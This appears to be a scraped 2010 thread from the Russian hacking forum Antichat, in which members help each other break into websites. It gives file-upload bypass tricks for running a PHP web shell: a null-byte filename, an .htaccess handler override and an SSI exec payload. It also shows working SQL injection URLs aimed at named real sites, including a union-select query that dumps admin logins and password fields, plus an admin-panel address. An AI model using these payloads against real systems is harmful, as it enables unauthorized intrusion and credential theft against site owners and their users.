Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.02.2010, 19:46
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
а .htaccess можно залить?
|
|
|
26.02.2010, 19:51
|
|
Участник форума
Регистрация: 18.05.2010
Сообщений: 215
Провел на форуме:
2972711
Репутация:
92
|
|
Сообщение от Rubaka
а .htaccess можно залить?
можно
|
|
|
|
26.02.2010, 20:54
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
а если shell.php%00.gif то обработается корректно или нет ?
|
|
|
|
26.02.2010, 23:33
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
так попробуй загрузить .htaccess и в нем прописать "AddHandler x-httpd-php .gif"
|
|
|
|
27.02.2010, 10:41
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Наткнулся на сайт __http://www.kvartal.ru, побродил по ссылкам и сразу нашел ошибку скрипта при подстановки в параметр кавычки:
__http://www.kvartal.ru/index.php?id=21%27
По всему похоже, что может получиться стандартная скуль, но пока не получается: пробовал вот как
1) http://www.kvartal.ru/index.php?id=21+and+1=1
2) http://www.kvartal.ru/index.php?id=21+and+1=2
вывод одинаковый, подстановка коментов тоже не помогла, ну и как и следовало ожидать подбор столбцов через order by тоже ни к чему не привел. Походу это ошибка скрипта, но не скуль.
Есть предположения в чем проблема?
Последний раз редактировалось mr.celt; 28.02.2010 в 00:57..
|
|
|
|
27.02.2010, 11:03
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Банальная строковая иньекция
http://www.quarta.su/index.php?id=621'+and+1=1/*&type=65
http://www.quarta.su/index.php?id=62d1%27+union+select+1,2,3,4,version% 28%29,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24/*&type=65
http://www.quarta.su/index.php?id=62d1'+union+select+1,2,3,4,group_conc at(concat_ws(0x3a,id_user,login,pswd)),6,7,8,9,0,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admi ns/*&type=65
Админка:
http://www.quarta.su/adm/index.php
Последний раз редактировалось Train; 27.02.2010 в 11:15..
|
|
|
|
27.02.2010, 12:17
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Все понял, спасибо. Ошибка была в том, что у параметра кавычку убирал и условия ставил.
Последний раз редактировалось mr.celt; 28.02.2010 в 01:01..
|
|
|
|
27.02.2010, 19:46
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
хм...когда я заливаю шелл через админку, и потом прохожу по его урлу почему-то отображается сам код пхп-шелла, т.е он сам не выполняется...в чем причина ?
|
|
|
|
27.02.2010, 19:51
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от daniel_1024
хм...когда я заливаю шелл через админку, и потом прохожу по его урлу почему-то отображается сам код пхп-шелла, т.е он сам не выполняется...в чем причина ?
.htaccess мб
|
|
|
|
27.02.2010, 20:02
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Если прикручен модуль mod_include
попробуй загрузить shell.txt с данными:
<!--#exec cmd="uname -a"-->
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1939522){kind=avatar}
Похожие темы
Линейный вид
